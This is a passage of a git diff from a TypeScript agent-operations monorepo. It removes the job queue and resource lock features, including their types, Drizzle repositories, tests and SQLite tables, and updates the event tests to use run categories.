"dispatched", - Running = "running", - Completed = "completed", - Failed = "failed", - Cancelled = "cancelled", -} - -export enum JobPriority { - Critical = "critical", - High = "high", - Normal = "normal", - Low = "low", -} - export enum SessionStatus { Provisioning = "provisioning", Active = "active", @@ -89,7 +65,6 @@ export enum SessionStatus { } export enum EventCategory { - Job = "job", Run = "run", Session = "session", Policy = "policy", @@ -98,12 +73,6 @@ export enum EventCategory { Agent = "agent", } -export enum LockType { - Repo = "repo", - Path = "path", - Branch = "branch", -} - // ─── Goal ──────────────────────────────────────────────────────────────────── export interface Goal { @@ -263,39 +232,6 @@ export interface Run { readonly updatedAt: string; } -// ─── Job ───────────────────────────────────────────────────────────────────── - -export interface ConcurrencyLimits { - readonly perRepo: number; - readonly perOrg: number; - readonly global: number; -} - -export interface RetryPolicy { - readonly maxRetries: number; - readonly backoffMs: number; - readonly backoffMultiplier: number; -} - -export interface Job { - readonly id: JobId; - readonly status: JobStatus; - readonly priority: JobPriority; - readonly goal: Goal; - readonly environment: Environment; - readonly retryPolicy: RetryPolicy; - readonly concurrencyLimits: ConcurrencyLimits; - readonly runIds: ReadonlyArray; - readonly sessionId: SessionId | null; - readonly attempt: number; - readonly maxAttempts: number; - readonly queuedAt: string; - readonly dispatchedAt: string | null; - readonly completedAt: string | null; - readonly createdAt: string; - readonly updatedAt: string; -} - // ─── Session ───────────────────────────────────────────────────────────────── export interface ResourceUsage { @@ -334,14 +270,3 @@ export interface AgentEvent { readonly timestamp: string; } -// ─── Lock ──────────────────────────────────────────────────────────────────── - -export interface ResourceLock { - readonly id: LockId; - readonly lockType: LockType; - readonly resource: string; - readonly holderId: string; - readonly acquiredAt: string; - readonly expiresAt: string; - readonly released: boolean; -} diff --git a/packages/db/src/__tests__/event-cursor.test.ts b/packages/db/src/__tests__/event-cursor.test.ts index 3e09e42..d6ebbe5 100644 --- a/packages/db/src/__tests__/event-cursor.test.ts +++ b/packages/db/src/__tests__/event-cursor.test.ts @@ -13,10 +13,10 @@ import { createEventId, EventCategory } from "@agentops/core"; function makeEvent(id: string, timestamp: string, overrides: Partial = {}): AgentEvent { return { id: createEventId(id), - category: EventCategory.Job, - type: "job.queued", - payload: { jobId: "job_1" }, - sourceId: "job_1", + category: EventCategory.Run, + type: "run.started", + payload: { jobId: "run_1" }, + sourceId: "run_1", timestamp, ...overrides, }; diff --git a/packages/db/src/__tests__/events.test.ts b/packages/db/src/__tests__/events.test.ts index f93d320..4f3ab3c 100644 --- a/packages/db/src/__tests__/events.test.ts +++ b/packages/db/src/__tests__/events.test.ts @@ -8,10 +8,10 @@ import { createEventId, EventCategory } from "@agentops/core"; function makeEvent(id: string, overrides: Partial = {}): AgentEvent { return { id: createEventId(id), - category: EventCategory.Job, - type: "job.queued", - payload: { jobId: "job_1" }, - sourceId: "job_1", + category: EventCategory.Run, + type: "run.started", + payload: { jobId: "run_1" }, + sourceId: "run_1", timestamp: "2025-01-01T00:00:00.000Z", ...overrides, }; @@ -32,10 +32,10 @@ describe("Events repository", () => { const retrieved = getEvent(db, createEventId("evt_1")); expect(retrieved).not.toBeNull(); expect(retrieved!.id).toBe("evt_1"); - expect(retrieved!.category).toBe(EventCategory.Job); - expect(retrieved!.type).toBe("job.queued"); - expect(retrieved!.sourceId).toBe("job_1"); - expect(retrieved!.payload).toEqual({ jobId: "job_1" }); + expect(retrieved!.category).toBe(EventCategory.Run); + expect(retrieved!.type).toBe("run.started"); + expect(retrieved!.sourceId).toBe("run_1"); + expect(retrieved!.payload).toEqual({ jobId: "run_1" }); }); it("returns null for non-existent event", () => { @@ -58,33 +58,33 @@ describe("Events repository", () => { }); it("filters by category", () => { - insertEvent(db, makeEvent("evt_1", { category: EventCategory.Job })); - insertEvent(db, makeEvent("evt_2", { category: EventCategory.Run })); - insertEvent(db, makeEvent("evt_3", { category: EventCategory.Job })); + insertEvent(db, makeEvent("evt_1", { category: EventCategory.Run })); + insertEvent(db, makeEvent("evt_2", { category: EventCategory.Session })); + insertEvent(db, makeEvent("evt_3", { category: EventCategory.Run })); - const results = listEvents(db, { category: "job" }); + const results = listEvents(db, { category: "run" }); expect(results).toHaveLength(2); - expect(results.every((e) => e.category === EventCategory.Job)).toBe(true); + expect(results.every((e) => e.category === EventCategory.Run)).toBe(true); }); it("filters by type", () => { - insertEvent(db, makeEvent("evt_1", { type: "job.queued" })); + insertEvent(db, makeEvent("evt_1", { type: "run.started" })); insertEvent(db, makeEvent("evt_2", { type: "job.completed" })); - insertEvent(db, makeEvent("evt_3", { type: "job.queued" })); + insertEvent(db, makeEvent("evt_3", { type: "run.started" })); - const results = listEvents(db, { type: "job.queued" }); + const results = listEvents(db, { type: "run.started" }); expect(results).toHaveLength(2); - expect(results.every((e) => e.type === "job.queued")).toBe(true); + expect(results.every((e) => e.type === "run.started")).toBe(true); }); it("filters by sourceId", () => { - insertEvent(db, makeEvent("evt_1", { sourceId: "job_1" })); - insertEvent(db, makeEvent("evt_2", { sourceId: "job_2" })); - insertEvent(db, makeEvent("evt_3", { sourceId: "job_1" })); + insertEvent(db, makeEvent("evt_1", { sourceId: "run_1" })); + insertEvent(db, makeEvent("evt_2", { sourceId: "run_2" })); + insertEvent(db, makeEvent("evt_3", { sourceId: "run_1" })); - const results = listEvents(db, { sourceId: "job_1" }); + const results = listEvents(db, { sourceId: "run_1" }); expect(results).toHaveLength(2); - expect(results.every((e) => e.sourceId === "job_1")).toBe(true); + expect(results.every((e) => e.sourceId === "run_1")).toBe(true); }); it("filters by since timestamp", () => { @@ -143,34 +143,34 @@ describe("Events repository", () => { }); it("counts events with filters", () => { - insertEvent(db, makeEvent("evt_1", { category: EventCategory.Job })); - insertEvent(db, makeEvent("evt_2", { category: EventCategory.Run })); - insertEvent(db, makeEvent("evt_3", { category: EventCategory.Job })); + insertEvent(db, makeEvent("evt_1", { category: EventCategory.Run })); + insertEvent(db, makeEvent("evt_2", { category: EventCategory.Session })); + insertEvent(db, makeEvent("evt_3", { category: EventCategory.Run })); - expect(countEvents(db, { category: "job" })).toBe(2); + expect(countEvents(db, { category: "run" })).toBe(2); }); }); describe("getEventsBySource", () => { it("returns events for a specific source", () => { - insertEvent(db, makeEvent("evt_1", { sourceId: "job_1" })); - insertEvent(db, makeEvent("evt_2", { sourceId: "job_2" })); - insertEvent(db, makeEvent("evt_3", { sourceId: "job_1" })); + insertEvent(db, makeEvent("evt_1", { sourceId: "run_1" })); + insertEvent(db, makeEvent("evt_2", { sourceId: "run_2" })); + insertEvent(db, makeEvent("evt_3", { sourceId: "run_1" })); - const results = getEventsBySource(db, "job_1"); + const results = getEventsBySource(db, "run_1"); expect(results).toHaveLength(2); - expect(results.every((e) => e.sourceId === "job_1")).toBe(true); + expect(results.every((e) => e.sourceId === "run_1")).toBe(true); }); it("respects limit parameter", () => { for (let i = 0; i < 10; i++) { insertEvent(db, makeEvent(`evt_${i}`, { - sourceId: "job_1", + sourceId: "run_1", timestamp: `2025-01-${String(i + 1).padStart(2, "0")}T00:00:00.000Z`, })); } - const results = getEventsBySource(db, "job_1", 3); + const results = getEventsBySource(db, "run_1", 3); expect(results).toHaveLength(3); }); }); diff --git a/packages/db/src/__tests__/jobs.test.ts b/packages/db/src/__tests__/jobs.test.ts deleted file mode 100644 index 821b432..0000000 --- a/packages/db/src/__tests__/jobs.test.ts +++ /dev/null @@ -1,205 +0,0 @@ -import { describe, it, expect, beforeEach } from "vitest"; -import { getDb } from "../connection.js"; -import { insertJob, getJob, listJobs, updateJob, countJobsByRepo, countJobsActive, getQueuedJobs } from "../jobs.js"; -import type { AgentOpsDb } from "../connection.js"; -import type { Job } from "@agentops/core"; -import { createJobId, JobStatus, JobPriority } from "@agentops/core"; - -function makeJob(id: string, overrides: Partial = {}): Job { - return { - id: createJobId(id), - status: JobStatus.Queued, - priority: JobPriority.Normal, - goal: { - humanReadable: "Test goal", - structured: { type: "task", description: "Test goal", parameters: {} }, - }, - environment: { - repo: "test/repo", - branch: "main", - permissions: [], - sandbox: { enabled: false, isolationLevel: "none" }, - }, - retryPolicy: { maxRetries: 3, backoffMs: 1000, backoffMultiplier: 2 }, - concurrencyLimits: { perRepo: 5, perOrg: 10, global: 50 }, - runIds: [], - sessionId: null, - attempt: 0, - maxAttempts: 3, - queuedAt: "2025-01-01T00:00:00.000Z", - dispatchedAt: null, - completedAt: null, - createdAt: "2025-01-01T00:00:00.000Z", - updatedAt: "2025-01-01T00:00:00.000Z", - ...overrides, - }; -} - -describe("Jobs repository", () => { - let db: AgentOpsDb; - - beforeEach(() => { - db = getDb(":memory:"); - }); - - describe("insertJob and getJob", () => { - it("inserts and retrieves a job", () => { - const job = makeJob("job_1"); - insertJob(db, job); - - const retrieved = getJob(db, createJobId("job_1")); - expect(retrieved).not.toBeNull(); - expect(retrieved!.id).toBe("job_1"); - expect(retrieved!.status).toBe(JobStatus.Queued); - expect(retrieved!.priority).toBe(JobPriority.Normal); - expect(retrieved!.goal.humanReadable).toBe("Test goal"); - expect(retrieved!.environment.repo).toBe("test/repo"); - }); - - it("returns null for non-existent job", () => { - const result = getJob(db, createJobId("nonexistent")); - expect(result).toBeNull(); - }); - }); - - describe("listJobs", () => { - it("lists all jobs ordered by createdAt descending", () => { - insertJob(db, makeJob("job_1", { createdAt: "2025-01-01T00:00:00.000Z" })); - insertJob(db, makeJob("job_2", { createdAt: "2025-01-02T00:00:00.000Z" })); - insertJob(db, makeJob("job_3", { createdAt: "2025-01-03T00:00:00.000Z" })); - - const results = listJobs(db); - expect(results).toHaveLength(3); - expect(results[0]!.id).toBe("job_3"); - expect(results[1]!.id).toBe("job_2"); - expect(results[2]!.id).toBe("job_1"); - }); - - it("filters by status", () => { - insertJob(db, makeJob("job_1", { status: JobStatus.Queued })); - insertJob(db, makeJob("job_2", { status: JobStatus.Running })); - insertJob(db, makeJob("job_3", { status: JobStatus.Queued })); - - const results = listJobs(db, { status: "queued" }); - expect(results).toHaveLength(2); - expect(results.every((j) => j.status === JobStatus.Queued)).toBe(true); - }); - - it("filters by repo", () => { - insertJob(db, makeJob("job_1", { - environment: { repo: "org/app", branch: "main", permissions: [], sandbox: { enabled: false, isolationLevel: "none" } }, - })); - insertJob(db, makeJob("job_2", { - environment: { repo: "org/lib", branch: "main", permissions: [], sandbox: { enabled: false, isolationLevel: "none" } }, - })); - - const results = listJobs(db, { repo: "org/app" }); - expect(results).toHaveLength(1); - expect(results[0]!.environment.repo).toBe("org/app"); - }); - - it("respects limit", () => { - for (let i = 0; i < 10; i++) { - insertJob(db, makeJob(`job_${i}`, { - createdAt: `2025-01-${String(i + 1).padStart(2, "0")}T00:00:00.000Z`, - })); - } - - const results = listJobs(db, { limit: 3 }); - expect(results).toHaveLength(3); - }); - }); - - describe("updateJob", () => { - it("updates job status", () => { - insertJob(db, makeJob("job_1", { status: JobStatus.Queued })); - - updateJob(db, createJobId("job_1"), { - status: JobStatus.Running, - updatedAt: "2025-01-02T00:00:00.000Z", - }); - - const updated = getJob(db, createJobId("job_1")); - expect(updated!.status).toBe(JobStatus.Running); - expect(updated!.updatedAt).toBe("2025-01-02T00:00:00.000Z"); - }); - - it("does nothing when no updates provided", () => { - insertJob(db, makeJob("job_1")); - const before = getJob(db, createJobId("job_1")); - - updateJob(db, createJobId("job_1"), {}); - - const after = getJob(db, createJobId("job_1")); - expect(after!.updatedAt).toBe(before!.updatedAt); - }); - }); - - describe("countJobsByRepo", () => { - it("counts jobs by repo and statuses", () => { - insertJob(db, makeJob("job_1", { - status: JobStatus.Running, - environment: { repo: "acme/app", branch: "main", permissions: [], sandbox: { enabled: false, isolationLevel: "none" } }, - })); - insertJob(db, makeJob("job_2", { - status: JobStatus.Queued, - environment: { repo: "acme/app", branch: "dev", permissions: [], sandbox: { enabled: false, isolationLevel: "none" } }, - })); - insertJob(db, makeJob("job_3", { - status: JobStatus.Completed, - environment: { repo: "acme/app", branch: "main", permissions: [], sandbox: { enabled: false, isolationLevel: "none" } }, - })); - - const active = countJobsByRepo(db, "acme/app", ["running", "queued"]); - expect(active).toBe(2); - }); - }); - - describe("countJobsActive", () => { - it("counts active jobs", () => { - insertJob(db, makeJob("job_1", { status: JobStatus.Running })); - insertJob(db, makeJob("job_2", { status: JobStatus.Queued })); - insertJob(db, makeJob("job_3", { status: JobStatus.Completed })); - insertJob(db, makeJob("job_4", { status: JobStatus.Dispatched })); - - expect(countJobsActive(db)).toBe(3); - }); - }); - - describe("getQueuedJobs", () => { - it("returns queued jobs ordered by priority desc then queuedAt asc", () => { - insertJob(db, makeJob("job_low", { - priority: JobPriority.Low, - queuedAt: "2025-01-01T00:00:00.000Z", - })); - insertJob(db, makeJob("job_critical", { - priority: JobPriority.Critical, - queuedAt: "2025-01-02T00:00:00.000Z", - })); - insertJob(db, makeJob("job_normal", { - priority: JobPriority.Normal, - queuedAt: "2025-01-01T00:00:00.000Z", - })); - insertJob(db, makeJob("job_running", { - status: JobStatus.Running, - priority: JobPriority.Critical, - queuedAt: "2025-01-01T00:00:00.000Z", - })); - - const queued = getQueuedJobs(db); - expect(queued).toHaveLength(3); - expect(queued[0]!.id).toBe("job_critical"); - expect(queued[1]!.id).toBe("job_normal"); - expect(queued[2]!.id).toBe("job_low"); - }); - - it("respects limit", () => { - for (let i = 0; i < 10; i++) { - insertJob(db, makeJob(`job_${i}`)); - } - - const queued = getQueuedJobs(db, 3); - expect(queued).toHaveLength(3); - }); - }); -}); diff --git a/packages/db/src/__tests__/locks.test.ts b/packages/db/src/__tests__/locks.test.ts deleted file mode 100644 index fcd5f87..0000000 --- a/packages/db/src/__tests__/locks.test.ts +++ /dev/null @@ -1,181 +0,0 @@ -import { describe, it, expect, beforeEach } from "vitest"; -import { getDb } from "../connection.js"; -import { - insertLock, - getLock, - listLocks, - updateLock, - getActiveLocks, - getActiveLocksForHolder, - releaseLocksForHolder, - releaseExpiredLocks, -} from "../locks.js"; -import type { AgentOpsDb } from "../connection.js"; -import type { ResourceLock } from "@agentops/core"; -import { createLockId, LockType } from "@agentops/core"; - -function makeLock(id: string, overrides: Partial = {}): ResourceLock { - return { - id: createLockId(id), - lockType: LockType.Repo, - resource: "acme/backend", - holderId: "agent_1", - acquiredAt: "2025-01-01T00:00:00.000Z", - expiresAt: new Date(Date.now() + 3600000).toISOString(), - released: false, - ...overrides, - }; -} - -describe("Locks repository", () => { - let db: AgentOpsDb; - - beforeEach(() => { - db = getDb(":memory:"); - }); - - describe("insertLock and getLock", () => { - it("inserts and retrieves a lock", () => { - const lock = makeLock("lock_1"); - insertLock(db, lock); - - const retrieved = getLock(db, createLockId("lock_1")); - expect(retrieved).not.toBeNull(); - expect(retrieved!.id).toBe("lock_1"); - expect(retrieved!.lockType).toBe(LockType.Repo); - expect(retrieved!.resource).toBe("acme/backend"); - expect(retrieved!.holderId).toBe("agent_1"); - expect(retrieved!.released).toBe(false); - }); - - it("returns null for non-existent lock", () => { - const result = getLock(db, createLockId("nonexistent")); - expect(result).toBeNull(); - }); - }); - - describe("listLocks", () => { - it("lists all locks ordered by acquiredAt descending", () => { - insertLock(db, makeLock("lock_1", { acquiredAt: "2025-01-01T00:00:00.000Z" })); - insertLock(db, makeLock("lock_2", { acquiredAt: "2025-01-02T00:00:00.000Z" })); - insertLock(db, makeLock("lock_3", { acquiredAt: "2025-01-03T00:00:00.000Z" })); - - const results = listLocks(db); - expect(results).toHaveLength(3); - expect(results[0]!.id).toBe("lock_3"); - expect(results[1]!.id).toBe("lock_2"); - expect(results[2]!.id).toBe("lock_1"); - }); - - it("filters by resource", () => { - insertLock(db, makeLock("lock_1", { resource: "acme/backend" })); - insertLock(db, makeLock("lock_2", { resource: "acme/frontend" })); - - const results = listLocks(db, { resource: "acme/backend" }); - expect(results).toHaveLength(1); - expect(results[0]!.resource).toBe("acme/backend"); - }); - - it("respects limit", () => { - for (let i = 0; i < 10; i++) { - insertLock(db, makeLock(`lock_${i}`)); - } - - const results = listLocks(db, { limit: 3 }); - expect(results).toHaveLength(3); - }); - - it("returns empty array when no locks match", () => { - const results = listLocks(db, { resource: "nonexistent" }); - expect(results).toEqual([]); - }); - }); - - describe("updateLock", () => { - it("updates released status", () => { - insertLock(db, makeLock("lock_1")); - - updateLock(db, createLockId("lock_1"), { released: true }); - - const updated = getLock(db, createLockId("lock_1")); - expect(updated!.released).toBe(true); - }); - - it("does nothing when no updates provided", () => { - insertLock(db, makeLock("lock_1")); - const before = getLock(db, createLockId("lock_1")); - - updateLock(db, createLockId("lock_1"), {}); - - const after = getLock(db, createLockId("lock_1")); - expect(after!.released).toBe(before!.released); - }); - }); - - describe("getActiveLocks", () => { - it("returns only active (unreleased, unexpired) locks for a resource", () => { - insertLock(db, makeLock("lock_active", { resource: "acme/backend" })); - insertLock(db, makeLock("lock_released", { resource: "acme/backend", released: true })); - insertLock(db, makeLock("lock_expired", { - resource: "acme/backend", - expiresAt: "2020-01-01T00:00:00.000Z", - })); - - const results = getActiveLocks(db, "acme/backend"); - expect(results).toHaveLength(1); - expect(results[0]!.id).toBe("lock_active"); - }); - }); - - describe("getActiveLocksForHolder", () => { - it("returns active locks for a specific holder", () => { - insertLock(db, makeLock("lock_1", { holderId: "agent_1" })); - insertLock(db, makeLock("lock_2", { holderId: "agent_2" })); - insertLock(db, makeLock("lock_3", { holderId: "agent_1", released: true })); - - const results = getActiveLocksForHolder(db, "agent_1"); - expect(results).toHaveLength(1); - expect(results[0]!.id).toBe("lock_1"); - }); - }); - - describe("releaseLocksForHolder", () => { - it("releases all active locks for a holder and returns count", () => { - insertLock(db, makeLock("lock_1", { holderId: "agent_1" })); - insertLock(db, makeLock("lock_2", { holderId: "agent_1" })); - insertLock(db, makeLock("lock_3", { holderId: "agent_2" })); - - const count = releaseLocksForHolder(db, "agent_1"); - expect(count).toBe(2); - - const remaining = getActiveLocksForHolder(db, "agent_1"); - expect(remaining).toHaveLength(0); - - // agent_2's lock should be unaffected - const agent2Locks = getActiveLocksForHolder(db, "agent_2"); - expect(agent2Locks).toHaveLength(1); - }); - }); - - describe("releaseExpiredLocks", () => { - it("releases expired locks and returns count", () => { - insertLock(db, makeLock("lock_active")); - insertLock(db, makeLock("lock_expired_1", { - expiresAt: "2020-01-01T00:00:00.000Z", - })); - insertLock(db, makeLock("lock_expired_2", { - expiresAt: "2020-06-01T00:00:00.000Z", - })); - - const count = releaseExpiredLocks(db); - expect(count).toBe(2); - - const expired1 = getLock(db, createLockId("lock_expired_1")); - expect(expired1!.released).toBe(true); - - // Active lock should be unaffected - const active = getLock(db, createLockId("lock_active")); - expect(active!.released).toBe(false); - }); - }); -}); diff --git a/packages/db/src/index.ts b/packages/db/src/index.ts index 78f546e..28ca11a 100644 --- a/packages/db/src/index.ts +++ b/packages/db/src/index.ts @@ -8,10 +8,8 @@ export { policies, policyResults, runMetrics, - jobs, sessions, events, - locks, users, apiTokens, authSessions, @@ -70,7 +68,6 @@ export { export type { AuditLogEntry, InsertAuditLogArgs, ListAuditLogsFilters } from "./audit.js"; // Job repository (WS1) -export { insertJob, getJob, listJobs, updateJob, countJobsByRepo, countJobsActive, getQueuedJobs } from "./jobs.js"; // Session repository (WS2) export { insertSession, getSession, listSessions, updateSession, getActiveSessions, countActiveSessions, getStaleSessions } from "./sessions.js"; @@ -80,7 +77,6 @@ export { insertEvent, getEvent, listEvents, countEvents, getEventsBySource, getR export { createEventPollCursor, advanceEventPollCursor, type EventPollCursor } from "./event-cursor.js"; // Lock repository (WS4) -export { insertLock, getLock, listLocks, updateLock, getActiveLocks, getActiveLocksForHolder, releaseLocksForHolder, releaseExpiredLocks } from "./locks.js"; // Seed export { seed } from "./seed.js"; diff --git a/packages/db/src/jobs.ts b/packages/db/src/jobs.ts deleted file mode 100644 index 1ea116c..0000000 --- a/packages/db/src/jobs.ts +++ /dev/null @@ -1,162 +0,0 @@ -import { eq, and, desc, asc, inArray, sql, count } from "drizzle-orm"; -import type { Job, JobId } from "@agentops/core"; -import { createJobId } from "@agentops/core"; -import type { AgentOpsDb } from "./connection.js"; -import { jobs } from "./schema.js"; - -interface ListJobsFilters { - status?: string; - repo?: string; - limit?: number; - offset?: number; -} - -function rowToJob(row: typeof jobs.$inferSelect): Job { - return { - id: createJobId(row.id), - status: row.status as Job["status"], - priority: row.priority as Job["priority"], - goal: row.goal as unknown as Job["goal"], - environment: row.environment as unknown as Job["environment"], - retryPolicy: row.retryPolicy as unknown as Job["retryPolicy"], - concurrencyLimits: row.concurrencyLimits as unknown as Job["concurrencyLimits"], - runIds: row.runIds as unknown as Job["runIds"], - sessionId: (row.sessionId as Job["sessionId"]) ?? null, - attempt: row.attempt, - maxAttempts: row.maxAttempts, - queuedAt: row.queuedAt, - dispatchedAt: row.dispatchedAt ?? null, - completedAt: row.completedAt ?? null, - createdAt: row.createdAt, - updatedAt: row.updatedAt, - }; -} - -export function insertJob(db: AgentOpsDb, job: Job): void { - db.insert(jobs) - .values({ - id: job.id as string, - status: job.status, - priority: job.priority, - goal: job.goal as unknown as Record, - environment: job.environment as unknown as Record, - repo: job.environment.repo, - branch: job.environment.branch, - retryPolicy: job.retryPolicy as unknown as Record, - concurrencyLimits: job.concurrencyLimits as unknown as Record, - runIds: job.runIds as unknown as Record, - sessionId: job.sessionId as string | null, - attempt: job.attempt, - maxAttempts: job.maxAttempts, - queuedAt: job.queuedAt, - dispatchedAt: job.dispatchedAt, - completedAt: job.completedAt, - createdAt: job.createdAt, - updatedAt: job.updatedAt, - }) - .run(); -} - -export function getJob(db: AgentOpsDb, id: JobId): Job | null { - const row = db.select().from(jobs).where(eq(jobs.id, id as string)).get(); - if (!row) return null; - return rowToJob(row); -} - -export function listJobs(db: AgentOpsDb, filters?: ListJobsFilters): Job[] { - const conditions = []; - if (filters?.status) { - conditions.push(eq(jobs.status, filters.status)); - } - if (filters?.repo) { - conditions.push(eq(jobs.repo, filters.repo)); - } - - let query = db - .select() - .from(jobs) - .orderBy(desc(jobs.createdAt)) - .$dynamic(); - - if (conditions.length > 0) { - query = query.where(and(...conditions)); - } - - if (filters?.limit) { - query = query.limit(filters.limit); - } - if (filters?.offset) { - query = query.offset(filters.offset); - } - - const rows = query.all(); - return rows.map(rowToJob); -} - -export function updateJob( - db: AgentOpsDb, - id: JobId, - updates: Partial, -): void { - const values: Record = {}; - - if (updates.status !== undefined) values["status"] = updates.status; - if (updates.priority !== undefined) values["priority"] = updates.priority; - if (updates.sessionId !== undefined) values["sessionId"] = updates.sessionId; - if (updates.runIds !== undefined) values["runIds"] = updates.runIds; - if (updates.attempt !== undefined) values["attempt"] = updates.attempt; - if (updates.dispatchedAt !== undefined) values["dispatchedAt"] = updates.dispatchedAt; - if (updates.completedAt !== undefined) values["completedAt"] = updates.completedAt; - if (updates.updatedAt !== undefined) values["updatedAt"] = updates.updatedAt; - - if (Object.keys(values).length > 0) { - db.update(jobs).set(values).where(eq(jobs.id, id as string)).run(); - } -} - -export function countJobsByRepo( - db: AgentOpsDb, - repo: string, - statuses: string[], -): number { - const conditions = [eq(jobs.repo, repo)]; - if (statuses.length > 0) { - conditions.push(inArray(jobs.status, statuses)); - } - - const row = db - .select({ total: count() }) - .from(jobs) - .where(and(...conditions)) - .get(); - return row?.total ?? 0; -} - -export function countJobsActive(db: AgentOpsDb): number { - const row = db - .select({ total: count() }) - .from(jobs) - .where(inArray(jobs.status, ["queued", "dispatched", "running"])) - .get(); - return row?.total ?? 0; -} - -export function getQueuedJobs(db: AgentOpsDb, limit: number = 50): Job[] { - const priorityOrder = sql`CASE ${jobs.priority} - WHEN 'critical' THEN 4 - WHEN 'high' THEN 3 - WHEN 'normal' THEN 2 - WHEN 'low' THEN 1 - ELSE 0 - END`; - - const rows = db - .select() - .from(jobs) - .where(eq(jobs.status, "queued")) - .orderBy(desc(priorityOrder), asc(jobs.queuedAt)) - .limit(limit) - .all(); - - return rows.map(rowToJob); -} diff --git a/packages/db/src/locks.ts b/packages/db/src/locks.ts deleted file mode 100644 index 860da64..0000000 --- a/packages/db/src/locks.ts +++ /dev/null @@ -1,152 +0,0 @@ -import { eq, and, desc, sql } from "drizzle-orm"; -import type { ResourceLock, LockId } from "@agentops/core"; -import { createLockId } from "@agentops/core"; -import type { AgentOpsDb } from "./connection.js"; -import { locks } from "./schema.js"; - -interface ListLocksFilters { - resource?: string; - active?: boolean; - limit?: number; - offset?: number; -} - -export function insertLock(db: AgentOpsDb, lock: ResourceLock): void { - db.insert(locks) - .values({ - id: lock.id as string, - lockType: lock.lockType, - resource: lock.resource, - holderId: lock.holderId, - acquiredAt: lock.acquiredAt, - expiresAt: lock.expiresAt, - released: lock.released, - }) - .run(); -} - -function rowToLock(row: typeof locks.$inferSelect): ResourceLock { - return { - id: createLockId(row.id), - lockType: row.lockType as ResourceLock["lockType"], - resource: row.resource, - holderId: row.holderId, - acquiredAt: row.acquiredAt, - expiresAt: row.expiresAt, - released: row.released, - }; -} - -export function getLock(db: AgentOpsDb, id: LockId): ResourceLock | null { - const row = db.select().from(locks).where(eq(locks.id, id as string)).get(); - if (!row) return null; - return rowToLock(row); -} - -export function listLocks(db: AgentOpsDb, filters?: ListLocksFilters): ResourceLock[] { - const conditions = []; - - if (filters?.resource) { - conditions.push(eq(locks.resource, filters.resource)); - } - - if (filters?.active) { - conditions.push(eq(locks.released, false)); - conditions.push(sql`${locks.expiresAt} > datetime('now')`); - } - - let query = db - .select() - .from(locks) - .orderBy(desc(locks.acquiredAt)) - .$dynamic(); - - if (conditions.length > 0) { - query = query.where(and(...conditions)); - } - - if (filters?.limit) { - query = query.limit(filters.limit); - } - if (filters?.offset) { - query = query.offset(filters.offset); - } - - const rows = query.all(); - return rows.map(rowToLock); -} - -export function updateLock( - db: AgentOpsDb, - id: LockId, - updates: Partial, -): void { - const values: Record = {}; - - if (updates.released !== undefined) values["released"] = updates.released; - if (updates.expiresAt !== undefined) values["expiresAt"] = updates.expiresAt; - - if (Object.keys(values).length > 0) { - db.update(locks).set(values).where(eq(locks.id, id as string)).run(); - } -} - -export function getActiveLocks(db: AgentOpsDb, resource: string): ResourceLock[] { - const rows = db - .select() - .from(locks) - .where( - and( - eq(locks.resource, resource), - eq(locks.released, false), - sql`${locks.expiresAt} > datetime('now')`, - ), - ) - .orderBy(desc(locks.acquiredAt)) - .all(); - return rows.map(rowToLock); -} - -export function getActiveLocksForHolder(db: AgentOpsDb, holderId: string): ResourceLock[] { - const rows = db - .select() - .from(locks) - .where( - and( - eq(locks.holderId, holderId), - eq(locks.released, false), - sql`${locks.expiresAt} > datetime('now')`, - ), - ) - .orderBy(desc(locks.acquiredAt)) - .all(); - return rows.map(rowToLock); -} - -export function releaseLocksForHolder(db: AgentOpsDb, holderId: string): number { - const result = db - .update(locks) - .set({ released: true }) - .where( - and( - eq(locks.holderId, holderId), - eq(locks.released, false), - ), - ) - .run(); - return result.changes; -} - -export function releaseExpiredLocks(db: AgentOpsDb): number { - const result = db - .update(locks) - .set({ released: true }) - .where( - and( - eq(locks.released, false), - sql`${locks.expiresAt} <= datetime('now')`, - ), - ) - .run(); - return result.changes; -} diff --git a/packages/db/src/migrate.ts b/packages/db/src/migrate.ts index 95f7414..091b095 100644 --- a/packages/db/src/migrate.ts +++ b/packages/db/src/migrate.ts @@ -89,33 +89,6 @@ export function migrate(sqlite: Database.Database): void { // ─── Orchestration tables ────────────────────────────────────────────────── sqlite.exec(` - CREATE TABLE IF NOT EXISTS jobs ( - id TEXT PRIMARY KEY, - status TEXT NOT NULL, - priority TEXT NOT NULL, - goal TEXT NOT NULL, - environment TEXT NOT NULL, - repo TEXT NOT NULL, - branch TEXT NOT NULL, - retry_policy TEXT NOT NULL, - concurrency_limits TEXT NOT NULL, - run_ids TEXT NOT NULL, - session_id TEXT, - attempt INTEGER NOT NULL DEFAULT 0, - max_attempts INTEGER NOT NULL DEFAULT 3, - queued_at TEXT NOT NULL, - dispatched_at TEXT, - completed_at TEXT, - created_at TEXT NOT NULL, - updated_at TEXT NOT NULL - ); - - CREATE INDEX IF NOT EXISTS idx_jobs_status ON jobs(status); - CREATE INDEX IF NOT EXISTS idx_jobs_priority ON jobs(priority); - CREATE INDEX IF NOT EXISTS idx_jobs_repo ON jobs(repo); - CREATE INDEX IF NOT EXISTS idx_jobs_session_id ON jobs(session_id); - CREATE INDEX IF NOT EXISTS idx_jobs_queued_at ON jobs(queued_at); - CREATE TABLE IF NOT EXISTS sessions ( id TEXT PRIMARY KEY, status TEXT NOT NULL, @@ -148,21 +121,6 @@ export function migrate(sqlite: Database.Database): void { CREATE INDEX IF NOT EXISTS idx_events_type ON events(type); CREATE INDEX IF NOT EXISTS idx_events_source_id ON events(source_id); CREATE INDEX IF NOT EXISTS idx_events_timestamp ON events(timestamp); - - CREATE TABLE IF NOT EXISTS locks ( - id TEXT PRIMARY KEY, - lock_type TEXT NOT NULL, - resource TEXT NOT NULL, - holder_id TEXT NOT NULL, - acquired_at TEXT NOT NULL, - expires_at TEXT NOT NULL, - released INTEGER NOT NULL DEFAULT 0 - ); - - CREATE INDEX IF NOT EXISTS idx_locks_resource ON locks(resource); - CREATE INDEX IF NOT EXISTS idx_locks_holder_id ON locks(holder_id); - CREATE INDEX IF NOT EXISTS idx_locks_released ON locks(released); - CREATE INDEX IF NOT EXISTS idx_locks_expires_at ON locks(expires_at); `); // ─── Auth tables ────────────────────────────────────────────────────────── diff --git a/packages/db/src/schema.ts b/packages/db/src/schema.ts index c7df477..4635faa 100644 --- a/packages/db/src/schema.ts +++ b/packages/db/src/schema.ts @@ -66,29 +66,6 @@ export const runMetrics = sqliteTable("run_metrics", { recordedAt: text("recorded_at").notNull(), }); -// ─── Jobs table ──────────────────────────────────────────────────────────── - -export const jobs = sqliteTable("jobs", { - id: text("id").primaryKey(), - status: text("status").notNull(), - priority: 